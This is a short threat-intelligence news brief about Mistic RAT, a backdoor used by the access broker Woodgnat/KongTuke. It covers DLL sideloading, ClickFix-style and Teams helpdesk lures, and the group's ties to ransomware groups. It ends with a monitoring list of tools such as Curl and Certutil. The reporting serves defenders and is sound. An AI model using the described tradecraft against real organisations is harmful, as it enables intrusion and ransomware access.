345/69 Thursday, June 25, 2026
Security researchers have revealed that the Initial Access Broker (IAB) group tracked as Woodgnat, also known as KongTuke, is using a new Remote Access Trojan (RAT) called Mistic RAT to compromise organizations across multiple industries. The group has been linked to providing network access to several ransomware operations, including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta, highlighting its role as a key facilitator in the ransomware ecosystem.
Mistic RAT provides the typical capabilities of a backdoor, including downloading and uploading files, managing files and directories, creating folders, and executing arbitrary code on compromised systems. It also allows attackers to adjust how frequently the malware checks in with its command-and-control (C2) server for new instructions and remotely terminate the malware when necessary. Researchers observed that Mistic RAT is commonly delivered as a DLL and executed using DLL sideloading, a technique designed to evade security detection by abusing legitimate applications.
According to the report, the threat group frequently leverages compromised WordPress websites and social engineering techniques to trick victims into executing attacker-controlled PowerShell commands through campaigns such as ClickFix, FileFix, and CrashFix. Since April 2026, the group has also begun impersonating IT helpdesk personnel through Microsoft Teams messages to lure users into running malicious commands. Organizations should closely monitor for suspicious PowerShell execution, unusual use of administrative tools such as Curl, Certutil, WMIC, Reg.exe, and Net.exe, and other behaviors that may indicate unauthorized access or an attempt to establish persistence before selling access to ransomware operators.
Source https://www.securityweek.com/new-mistic-rat-opens-door-to-several-ransomware-families/